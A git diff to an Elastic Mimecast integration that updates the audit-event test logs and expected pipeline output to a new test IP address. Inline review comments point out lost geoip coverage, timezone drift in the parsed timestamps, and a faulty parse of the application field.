Product: 
Sync and Recover, App (provider): Microsoft O365\nSuccess: true, Date: 2021-10-12, Time: 08:47:53+0000, IP: 8.8.8.8, Application: Administration Console","category":"integrations_and_apis"} -{"id":"eNqrVipOTS4tSs1MUbJSynAJ8yuoyA4z9ygMNyv21C42MC9IDwtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkbmFhoqOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWADk2K8U","auditType":"Page Data Exports","user":"johndoe@example.com","eventTime":"2021-10-12T02:27:18+0000","eventInfo":"[Export type : Download,Name :watchlist_view,Requested By :johdoe@example.com,Export time :Tue Oct 12 03:27:18 BST 2021,IP Address :8.8.8.8,Columns exported :Name|Email|Department|Number of Videos|,File name : export_at_watchlist_view_1634005638160.xlsx,File Size: 6864,File type : .xlsx], Date: 2021-10-12, Time: 02:27:18+0000, IP: 8.8.8.8, Application: mimecast-matfe","category":"account_logs"} -{"id":"eNqrVipOTS4tSs1MUbJSMi8zSc3J8M4Od_NwjdHPMDYzdfGO8MkJS_PXNg12dQt3j_QMr4oyi_SO0Xf1jswtM7TINncxTNTO97OsNPQqqAwNU9JRSixNySzJyU8HmWhsaGlsZGppaKajlFxaXJKfm1qUnJ-SCrTK2cTM0dwUqLwstag4Mz9PycqwFgAmqSuF","auditType":"Custom Report Definition Created","user":"johndoe@example.local","eventTime":"2021-10-11T19:53:41+0000","eventInfo":"Action Performed - Custom Report Definition Created with name \"Terri test\" and description \"all user - per email report\" by johndoe@example.local Date: 2021-10-11 Time: 20:53:41 +0100 IP: 8.8.8.8 Application: Administration Console","category":"reporting_logs"} -{"id":"eNqrVipOTS4tSs1MUbJSCij080lzDChMMjXw8o3IjnCLDIrRT8wJS_PXNg12dQt3j_QMr4oyi_SO0Xf1jswtM7TINncxTNTO97OsNPQqqAwNU9JRSixNySzJyU8HmWhsaGlsZGpiYaqjlFxaXJKfm1qUnJ-SCrTK2cTM0dwUqLwstag4Mz9PycqwFgBNvCvh","auditType":"Folder Log Entry","user":"johndoe@example.com","eventTime":"2021-10-11T18:23:10+0000","eventInfo":"Action Performed - Deleted New Folder by johndoe@example.com Date: 2021-10-11 Time: 19:23:10 +0100 IP: 8.8.8.8 Application: Administration Console","category":"profile_group_logs"} 
+{"id":"eNqrVipOTS4tSs1MUbJSSiwLM8srLCvJzg8s8HbydCpz0Y6oCAtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxsaG5ooKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAHTYLDo","auditType":"Case Action","user":"johndoe@example.com","eventTime":"2021-10-12T09:19:53+0000","eventInfo":"Viewed Case - Case: Class Action, Date: 2021-10-12, Time: 09:19:53+0000, IP: 67.43.156.15, Application: mimecast-case-review","category":"case_review_logs"} +{"id":"eNqrVipOTS4tSs1MUbJSMvCrMHX2MzL1yLFITjJNd8rO9wiJyAlL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxsaGRkoKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAPktKzg","auditType":"Logon Authentication Failed","user":"johndoe@example.com","eventTime":"2021-10-12T08:47:55+0000","eventInfo":"Failed authentication for johndoe@example.com , Date: 2021-10-12, Time: 09:47:55 BST, IP: 67.43.156.15, Application: mimecast-moa, Method: Office 365, Reason: Wrong password","category":"authentication_logs"} +{"id":"eNqrVipOTS4tSs1MUbJSSnJMinKNMMtyDg3xKw2rDM91DC-JdAtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxsaGRooaOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAEQYK9w","auditType":"Existing Archive Task Changed","user":"johdoe@example.com","eventTime":"2021-10-12T08:47:54+0000","eventInfo":"Successfully updated 3 'Sync and Recover' tasks associated with legacy connection (\"365\") to new migrated connector (\"Sync and Recover - 365\"), Date: 2021-10-12, Time: 08:47:54+0000, IP: 67.43.156.15, Application: Administration Console","category":"archive_service_logs"} +{"id":"eNoVzc0KgkAUQOF3uVsFuZma7qQ0UqiFqChuZH7M0iZmHMOid8_2h-98QDGiJespBDBgYwn-4orcHMrr_JqUWdjFBb8YThbF5bE6le_ardLGitJqnHF39w7YGuLsL5g8l7wAE1pN-2kQ3V-00bdt3KBrAtFqEiOTRFC2rvZbN_ScNZ-ZVL14QIDfH41XLGM","auditType":"Connectors Management","user":"johndoe@example.com","eventTime":"2021-10-12T08:47:53+0000","eventInfo":"Connector creation for Microsoft O365\nName: Sync and Recover - 365, Description: 
null, Product: Sync and Recover, App (provider): Microsoft O365\nSuccess: true, Date: 2021-10-12, Time: 08:47:53+0000, IP: 67.43.156.15, Application: Administration Console","category":"integrations_and_apis"} +{"id":"eNqrVipOTS4tSs1MUbJSynAJ8yuoyA4z9ygMNyv21C42MC9IDwtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkbmFhoqOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWADk2K8U","auditType":"Page Data Exports","user":"johndoe@example.com","eventTime":"2021-10-12T02:27:18+0000","eventInfo":"[Export type : Download,Name :watchlist_view,Requested By :johdoe@example.com,Export time :Tue Oct 12 03:27:18 BST 2021,IP Address :67.43.156.15,Columns exported :Name|Email|Department|Number of Videos|,File name : export_at_watchlist_view_1634005638160.xlsx,File Size: 6864,File type : .xlsx], Date: 2021-10-12, Time: 02:27:18+0000, IP: 67.43.156.15, Application: mimecast-matfe","category":"account_logs"} +{"id":"eNqrVipOTS4tSs1MUbJSMi8zSc3J8M4Od_NwjdHPMDYzdfGO8MkJS_PXNg12dQt3j_QMr4oyi_SO0Xf1jswtM7TINncxTNTO97OsNPQqqAwNU9JRSixNySzJyU8HmWhsaGlsZGppaKajlFxaXJKfm1qUnJ-SCrTK2cTM0dwUqLwstag4Mz9PycqwFgAmqSuF","auditType":"Custom Report Definition Created","user":"johndoe@example.local","eventTime":"2021-10-11T19:53:41+0000","eventInfo":"Action Performed - Custom Report Definition Created with name \"Terri test\" and description \"all user - per email report\" by johndoe@example.local Date: 2021-10-11 Time: 20:53:41 +0100 IP: 67.43.156.15 Application: Administration Console","category":"reporting_logs"} +{"id":"eNqrVipOTS4tSs1MUbJSCij080lzDChMMjXw8o3IjnCLDIrRT8wJS_PXNg12dQt3j_QMr4oyi_SO0Xf1jswtM7TINncxTNTO97OsNPQqqAwNU9JRSixNySzJyU8HmWhsaGlsZGpiYaqjlFxaXJKfm1qUnJ-SCrTK2cTM0dwUqLwstag4Mz9PycqwFgBNvCvh","auditType":"Folder Log Entry","user":"johndoe@example.com","eventTime":"2021-10-11T18:23:10+0000","eventInfo":"Action Performed - Deleted New Folder by johndoe@example.com Date: 2021-10-11 Time: 19:23:10 +0100 IP: 67.43.156.15 Application: Administration 
Console","category":"profile_group_logs"} {"id":"eNqrVipOTS4tSs1MUbJSCtF28jc2DDLwd_d1NM7ULnLzdnPzdwtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxiCAQ6SsmlxSX5ualFyfkpqUCbnE3MHM1NgcrLUouKM_PzlKwMawGTZipR","auditType":"User Password Changed","user":"johndoe@example.com","eventTime":"2021-10-12T19:56:55+0000","eventInfo":"Password reset for user: johndoe@example.com User Password Changed, Remote IP is null","category":"user_account_and_role_logs"} -{"id":"eNqrVipOTS4tSs1MUbJSSgwpLctzzah00TbMTTawdC4NDPAzzwlL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxiaGBhoqOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWADOfK6w","auditType":"Remediation Incident Adjustment","user":"johndoe@example.com","eventTime":"2021-10-12T19:49:30+0000","eventInfo":"Remediation Incident Created - TR-C46A75-01420-M, type : manual, search criteria : {\"fileHash\":\"9e6011844705292d5abfe0aa38d8aff02f6d8f69689c2e7cb2338f9484774bb3\",\"start\":\"2021-09-12T19:48:59+0000\",\"end\":\"2021-10-12T19:48:59+0000\"}, Date: 2021-10-12, Time: 19:49:30+0000, IP: 8.8.8.8, Application: Administration Console","category":"account_logs"} -{"id":"eNoVzdEKgjAYQOF3-W8Vaps69S7KooSEJGXSzdAVMtdi04FF757dH77zASvayYi-gxQIcbI0HEtcRI5aRS7SxkN1L7ywzPb1gR3rdxOx_LbKcqYciiXdIe7pczKj02u-VuADn7p-HPTjDxKUkGCdUOxDO9lRK2Fa3YnltA2iDQ2X3Alje_2EFH1_LYQrrw","auditType":"Archive Mailbox Restore","user":"johndoe@example.com","eventTime":"2021-10-12T19:20:01+0000","eventInfo":"Archive mailbox restore created. 
Restored data from johdoe@example.com to johndoe@example.com by johndoe@example.com, Date: 2021-10-12, Time: 19:20:01+0000, IP: 8.8.8.8, Application: Administration Console","category":"archive_service_logs"} -{"id":"eNqrVipOTS4tSs1MUbJSigzJC_ZNzg-vcjYKcwz3icotC0nVdgtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxiYG5kqaOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAD-SK84","auditType":"Archive Mailbox Restore","user":"johndoejr@example.com","eventTime":"2021-10-12T18:19:33+0000","eventInfo":"Archive mailbox restore created. Restored data from johndoe@example.com to johndoejr@example.com by johndoejr@example.com, Date: 2021-10-12, Time: 18:19:33+0000, IP: 8.8.8.8, Application: Administration Console","category":"archive_service_logs"} -{"id":"eNqrVipOTS4tSs1MUbJScjMvyjIxr6yoLDY2qQopLq3yDnM1dwtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxiYGZorKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAE5dK-0","auditType":"Archive Mailbox Export Download","user":"johndoe@example.com","eventTime":"2021-10-12T17:55:14+0000","eventInfo":"Mailbox export downloaded. 
Download filename (HTML Report recovery id): eNqrVipOTS4tSs1MUbJSyo3RDw81rTCpynMpdiuICMopyihxynZztcisDMoN9zWLSCrPzAjz9PALNzFwySrLMNQ2yUs38g9zS860cHKNMExR0lFKLi0uyc9NLUrOT0kFGulsYuZobgoUL0pNzi9LLarULUksztYFWWdpaKqjBBQqzszPU7IyrAUAsSEteA by johndoe@example.com, Date: 2021-10-12, Time: 17:55:14+0000, IP: 8.8.8.8, Application: Administration Console","category":"archive_service_logs"} -{"id":"eNqrVipOTS4tSs1MUbJSitH39gl1cS509PT1MSnw90l0CinPCQgLS_PXNg12dQt3j_QMr4oyi_SO0Xf1jswtM7TINncxTNTO97OsNPQqqAwNU9JRSixNySzJyU8HmWhsaGlsYmBsYqqjlFxaXJKfm1qUnJ-SCrTK2cTM0dwUqLwstag4Mz9PycqwFgAxASul","auditType":"Review Set Action","user":"johndoe@example.com","eventTime":"2021-10-12T17:07:00+0000","eventInfo":"Viewed Review Set Details - Case: Class Action, Review Set: Contracts, Date: 2021-10-12, Time: 17:07:00+0000, IP: 8.8.8.8, Application: mimecast-case-review","category":"case_review_logs"} -{"id":"eNqrVipOTS4tSs1MUbJS8vDNLCt0DHEKS4xICvNJqzQ1MjOyyAlL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxsaWJurKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAByMK38","auditType":"Remediation Incident Adjustment","user":"johndoe@example.com","eventTime":"2021-10-12T15:38:05+0000","eventInfo":"Restore Remediation Incident Created - TR-C46A75-01419-R, type : restore, search criteria : {\"unremediateCode\":\"TR-C46A75-01419-M\",\"from\":\"gmail.com\",\"start\":\"2021-10-10T15:33:49+0000\",\"end\":\"2021-10-12T15:33:49+0000\"}, Date: 2021-10-12, Time: 15:38:05+0000, IP: 8.8.8.8, Application: Administration Console","category":"account_logs"} \ No newline at end of file +{"id":"eNqrVipOTS4tSs1MUbJSSgwpLctzzah00TbMTTawdC4NDPAzzwlL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxiaGBhoqOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWADOfK6w","auditType":"Remediation Incident Adjustment","user":"johndoe@example.com","eventTime":"2021-10-12T19:49:30+0000","eventInfo":"Remediation Incident Created - TR-C46A75-01420-M, type : manual, search 
criteria : {\"fileHash\":\"9e6011844705292d5abfe0aa38d8aff02f6d8f69689c2e7cb2338f9484774bb3\",\"start\":\"2021-09-12T19:48:59+0000\",\"end\":\"2021-10-12T19:48:59+0000\"}, Date: 2021-10-12, Time: 19:49:30+0000, IP: 67.43.156.15, Application: Administration Console","category":"account_logs"} +{"id":"eNoVzdEKgjAYQOF3-W8Vaps69S7KooSEJGXSzdAVMtdi04FF757dH77zASvayYi-gxQIcbI0HEtcRI5aRS7SxkN1L7ywzPb1gR3rdxOx_LbKcqYciiXdIe7pczKj02u-VuADn7p-HPTjDxKUkGCdUOxDO9lRK2Fa3YnltA2iDQ2X3Alje_2EFH1_LYQrrw","auditType":"Archive Mailbox Restore","user":"johndoe@example.com","eventTime":"2021-10-12T19:20:01+0000","eventInfo":"Archive mailbox restore created. Restored data from johdoe@example.com to johndoe@example.com by johndoe@example.com, Date: 2021-10-12, Time: 19:20:01+0000, IP: 67.43.156.15, Application: Administration Console","category":"archive_service_logs"} +{"id":"eNqrVipOTS4tSs1MUbJSigzJC_ZNzg-vcjYKcwz3icotC0nVdgtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxiYG5kqaOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAD-SK84","auditType":"Archive Mailbox Restore","user":"johndoejr@example.com","eventTime":"2021-10-12T18:19:33+0000","eventInfo":"Archive mailbox restore created. Restored data from johndoe@example.com to johndoejr@example.com by johndoejr@example.com, Date: 2021-10-12, Time: 18:19:33+0000, IP: 67.43.156.15, Application: Administration Console","category":"archive_service_logs"} +{"id":"eNqrVipOTS4tSs1MUbJScjMvyjIxr6yoLDY2qQopLq3yDnM1dwtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxiYGZorKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAE5dK-0","auditType":"Archive Mailbox Export Download","user":"johndoe@example.com","eventTime":"2021-10-12T17:55:14+0000","eventInfo":"Mailbox export downloaded. 
Download filename (HTML Report recovery id): eNqrVipOTS4tSs1MUbJSyo3RDw81rTCpynMpdiuICMopyihxynZztcisDMoN9zWLSCrPzAjz9PALNzFwySrLMNQ2yUs38g9zS860cHKNMExR0lFKLi0uyc9NLUrOT0kFGulsYuZobgoUL0pNzi9LLarULUksztYFWWdpaKqjBBQqzszPU7IyrAUAsSEteA by johndoe@example.com, Date: 2021-10-12, Time: 17:55:14+0000, IP: 67.43.156.15, Application: Administration Console","category":"archive_service_logs"} +{"id":"eNqrVipOTS4tSs1MUbJSitH39gl1cS509PT1MSnw90l0CinPCQgLS_PXNg12dQt3j_QMr4oyi_SO0Xf1jswtM7TINncxTNTO97OsNPQqqAwNU9JRSixNySzJyU8HmWhsaGlsYmBsYqqjlFxaXJKfm1qUnJ-SCrTK2cTM0dwUqLwstag4Mz9PycqwFgAxASul","auditType":"Review Set Action","user":"johndoe@example.com","eventTime":"2021-10-12T17:07:00+0000","eventInfo":"Viewed Review Set Details - Case: Class Action, Review Set: Contracts, Date: 2021-10-12, Time: 17:07:00+0000, IP: 67.43.156.15, Application: mimecast-case-review","category":"case_review_logs"} +{"id":"eNqrVipOTS4tSs1MUbJS8vDNLCt0DHEKS4xICvNJqzQ1MjOyyAlL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxsaWJurKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAByMK38","auditType":"Remediation Incident Adjustment","user":"johndoe@example.com","eventTime":"2021-10-12T15:38:05+0000","eventInfo":"Restore Remediation Incident Created - TR-C46A75-01419-R, type : restore, search criteria : {\"unremediateCode\":\"TR-C46A75-01419-M\",\"from\":\"gmail.com\",\"start\":\"2021-10-10T15:33:49+0000\",\"end\":\"2021-10-12T15:33:49+0000\"}, Date: 2021-10-12, Time: 15:38:05+0000, IP: 67.43.156.15, Application: Administration Console","category":"account_logs"} \ No newline at end of file diff --git a/packages/mimecast/data_stream/audit_events/_dev/test/pipeline/test-audit-events.log-expected.json b/packages/mimecast/data_stream/audit_events/_dev/test/pipeline/test-audit-events.log-expected.json index 544423efd4b..f11c9833871 100644 --- a/packages/mimecast/data_stream/audit_events/_dev/test/pipeline/test-audit-events.log-expected.json 
+++ b/packages/mimecast/data_stream/audit_events/_dev/test/pipeline/test-audit-events.log-expected.json
@@ -15,31 +15,16 @@
 "johndoe@example.com"
 ],
 "ip": [
- "8.8.8.8"
+ "67.43.156.15"
 ]
 },
 "client": {
- "geo": {
- "continent_name": "North America",
- "country_name": "United States",
- "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
- },
- "as": {
- "number": 15169,
- "organization": {
- "name": "Google LLC"
- }
- },
- "ip": "8.8.8.8"
+ "ip": "67.43.156.15"
 },
 "event": {
 "action": "threat-intel-feed-download",
- "ingested": "2021-11-25T11:34:08.372326900Z",
- "original": "{\"auditType\":\"Threat Intel Feed Download\",\"category\":\"reporting_logs\",\"eventInfo\":\"Threat intel multiple feeds download - malware_customer_csv_20211018094502564.zip, Date: 2021-10-18, Time: 08:45:02+0000, IP: 8.8.8.8, Application: Integrations\",\"eventTime\":\"2021-10-18T08:45:02+0000\",\"id\":\"eNqrVipOTS4tSs1MUbJS8im3dA5NjAxJTPP0svD1jioo9IsINgxL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxpbmRhoKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWACCXK48\",\"user\":\"johndoe@example.com\"}",
+ "ingested": "2021-12-09T15:16:03.637458Z",
+ "original": "{\"auditType\":\"Threat Intel Feed Download\",\"category\":\"reporting_logs\",\"eventInfo\":\"Threat intel multiple feeds download - malware_customer_csv_20211018094502564.zip, Date: 2021-10-18, Time: 08:45:02+0000, IP: 67.43.156.15, Application: Integrations\",\"eventTime\":\"2021-10-18T08:45:02+0000\",\"id\":\"eNqrVipOTS4tSs1MUbJS8im3dA5NjAxJTPP0svD1jioo9IsINgxL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxpbmRhoKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWACCXK48\",\"user\":\"johndoe@example.com\"}",
 "id": "eNqrVipOTS4tSs1MUbJS8im3dA5NjAxJTPP0svD1jioo9IsINgxL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxpbmRhoKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWACCXK48",
 "created": "2021-10-18T08:45:02.000Z"
 },
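Review bot: The regenerated expectation in this hunk removes `client.geo` and `client.as` outright instead of replacing them with the enrichment for the new address, so after this commit the pipeline test no longer checks any geoip output; the same removal is repeated in the hunks at @@ -72, @@ -125, @@ -178, @@ -231, @@ -284, @@ -337, @@ -390 and @@ -454. If the point of moving to the supported test subset is deterministic enrichment, the expected file should carry whatever the test database returns for 67.43.156.15; if no enrichment is expected for it, the commit message should say so, because as written the loss of coverage reads as accidental. `event.ingested` is also re-pinned to a fresh wall-clock value in every one of these hunks, which is noise on each regeneration; marking it as a dynamic field in the pipeline test config would keep it out of future diffs.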
@@ -54,7 +39,7 @@
 "mimecast": {
 "application": "Integrations",
 "category": "reporting_logs",
- "eventInfo": "Threat intel multiple feeds download - malware_customer_csv_20211018094502564.zip, Date: 2021-10-18, Time: 08:45:02+0000, IP: 8.8.8.8, Application: Integrations"
+ "eventInfo": "Threat intel multiple feeds download - malware_customer_csv_20211018094502564.zip, Date: 2021-10-18, Time: 08:45:02+0000, IP: 67.43.156.15, Application: Integrations"
 }
 },
 {
@@ -72,31 +57,16 @@
 "johndoe@example"
 ],
 "ip": [
- "8.8.8.8"
+ "67.43.156.15"
 ]
 },
 "client": {
- "geo": {
- "continent_name": "North America",
- "country_name": "United States",
- "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
- },
- "as": {
- "number": 15169,
- "organization": {
- "name": "Google LLC"
- }
- },
- "ip": "8.8.8.8"
+ "ip": "67.43.156.15"
 },
 "event": {
 "action": "threat-intel-feed-download",
- "ingested": "2021-11-25T11:34:08.372329600Z",
- "original": "{\"id\": \"eNqrVipOTS4tSs1MUbJS8nbx8CoyTPFN9akM9K5KqnQyi8z2DgtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxoaG5grKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWADbWK70\",\"auditType\": \"Threat Intel Feed Download\",\"user\": \"johndoe@example\",\"eventTime\": \"2021-10-10T22:51:57+0000\",\"eventInfo\": \"Threat intel multiple feeds download - malware_grid_csv_20211010235157027.zip, Date: 2021-10-10, Time: 22:51:57+0000, IP: 8.8.8.8, Application: Azure Sentinel\",\"category\": \"reporting_logs\"}",
+ "ingested": "2021-12-09T15:16:03.637467Z",
+ "original": "{\"id\": \"eNqrVipOTS4tSs1MUbJS8nbx8CoyTPFN9akM9K5KqnQyi8z2DgtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxoaG5grKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWADbWK70\",\"auditType\": \"Threat Intel Feed Download\",\"user\": \"johndoe@example\",\"eventTime\": \"2021-10-10T22:51:57+0000\",\"eventInfo\": \"Threat intel multiple feeds download - malware_grid_csv_20211010235157027.zip, Date: 2021-10-10, Time: 22:51:57+0000, IP: 67.43.156.15, Application: Azure Sentinel\",\"category\": \"reporting_logs\"}",
 "id": "eNqrVipOTS4tSs1MUbJS8nbx8CoyTPFN9akM9K5KqnQyi8z2DgtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxoaG5grKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWADbWK70",
 "created": "2021-10-10T22:51:57.000Z"
 },
@@ -111,7 +81,7 @@
 "mimecast": {
 "application": "Azure Sentinel",
 "category": "reporting_logs",
- "eventInfo": "Threat intel multiple feeds download - malware_grid_csv_20211010235157027.zip, Date: 2021-10-10, Time: 22:51:57+0000, IP: 8.8.8.8, Application: Azure Sentinel"
+ "eventInfo": "Threat intel multiple feeds download - malware_grid_csv_20211010235157027.zip, Date: 2021-10-10, Time: 22:51:57+0000, IP: 67.43.156.15, Application: Azure Sentinel"
 }
 },
 {
@@ -125,31 +95,16 @@
 "johndoe@example.com"
 ],
 "ip": [
- "8.8.8.8"
+ "67.43.156.15"
 ]
 },
 "client": {
- "geo": {
- "continent_name": "North America",
- "country_name": "United States",
- "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
- },
- "as": {
- "number": 15169,
- "organization": {
- "name": "Google LLC"
- }
- },
- "ip": "8.8.8.8"
+ "ip": "67.43.156.15"
 },
 "event": {
 "action": "user-logged-on",
- "ingested": "2021-11-25T11:34:08.372330600Z",
- "original": "{\"id\": \"eNqrVipOTS4tSs1MUbJSivD0cisuyAirMgpxDy12dPNMMcn1zQlL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkamhiqOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWADo9K8A\",\"auditType\": \"User Logged On\",\"user\": \"johndoe@example.com\",\"eventTime\": \"2021-10-11T17:17:30+0000\",\"eventInfo\": \"Successful authentication for johndoe@example.com \u003cJohn Doe\u003e, Date: 2021-10-11, Time: 18:17:30 BST, IP: 8.8.8.8, Application: Administration Console, Method: Two Step Auth, 2FA: TOTP\",\"category\": \"authentication_logs\"}",
+ "ingested": "2021-12-09T15:16:03.637473400Z",
+ "original": "{\"id\": \"eNqrVipOTS4tSs1MUbJSivD0cisuyAirMgpxDy12dPNMMcn1zQlL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkamhiqOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWADo9K8A\",\"auditType\": \"User Logged On\",\"user\": \"johndoe@example.com\",\"eventTime\": \"2021-10-11T17:17:30+0000\",\"eventInfo\": \"Successful authentication for johndoe@example.com \u003cJohn Doe\u003e, Date: 2021-10-11, Time: 18:17:30 BST, IP: 67.43.156.15, Application: Administration Console, Method: Two Step Auth, 2FA: TOTP\",\"category\": \"authentication_logs\"}",
 "id": "eNqrVipOTS4tSs1MUbJSivD0cisuyAirMgpxDy12dPNMMcn1zQlL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkamhiqOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWADo9K8A",
 "created": "2021-10-11T07:17:30.000Z"
 },
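Review bot: The re-pinned `event.created` of `2021-10-11T07:17:30.000Z` is ten hours off the record's own `eventTime` of `2021-10-11T17:17:30+0000`, which suggests `created` is being parsed from the `Time: 18:17:30 BST` text in `eventInfo` with the abbreviation resolved to some zone other than British Summer Time; the same drift is in the hunks at @@ -178 (07:17:26Z vs 17:17:26+0000) and @@ -231 (06:03:38Z vs 16:03:38+0000), and in the @@ -284 and @@ -337 hunks the explicit `+0100` offset is dropped instead (16:39:17Z vs 15:39:17+0000, 12:46:40Z vs 11:46:40+0000). Accepting the regenerated fixture enshrines these values as correct. Since `eventTime` already carries an unambiguous offset, `event.created` should be derived from it and the Date/Time text in `eventInfo` treated as informational only; the pipeline that does the parsing is outside this diff.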
@@ -164,7 +119,7 @@
 "mimecast": {
 "application": "Administration Console, Method: Two Step Auth, 2FA: TOTP",
 "category": "authentication_logs",
- "eventInfo": "Successful authentication for johndoe@example.com \u003cJohn Doe\u003e, Date: 2021-10-11, Time: 18:17:30 BST, IP: 8.8.8.8, Application: Administration Console, Method: Two Step Auth, 2FA: TOTP"
+ "eventInfo": "Successful authentication for johndoe@example.com \u003cJohn Doe\u003e, Date: 2021-10-11, Time: 18:17:30 BST, IP: 67.43.156.15, Application: Administration Console, Method: Two Step Auth, 2FA: TOTP"
 }
 },
 {
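Review bot: `mimecast.application` is pinned here as `"Administration Console, Method: Two Step Auth, 2FA: TOTP"`, so the split of the comma-separated tail of `eventInfo` takes everything after `Application:` instead of stopping at the next `, Method:` key; the hunks at @@ -217 (`..., Method: Office 365, 2FA: TOTP`) and @@ -270 (`..., Method: Cloud`) show the same. For authentication logs the method and second-factor type are exactly what a detection rule or a triage query would filter on, and with this parse they are only reachable by substring matching on `application`. The extraction is in the ingest pipeline, which this diff does not touch, but regenerating the fixture locks the wrong value in as the expected one.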
@@ -178,31 +133,16 @@
 "johndoe@example.com"
 ],
 "ip": [
- "8.8.8.8"
+ "67.43.156.15"
 ]
 },
 "client": {
- "geo": {
- "continent_name": "North America",
- "country_name": "United States",
- "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
- },
- "as": {
- "number": 15169,
- "organization": {
- "name": "Google LLC"
- }
- },
- "ip": "8.8.8.8"
+ "ip": "67.43.156.15"
 },
 "event": {
 "action": "logon-requires-challenge",
- "ingested": "2021-11-25T11:34:08.372331600Z",
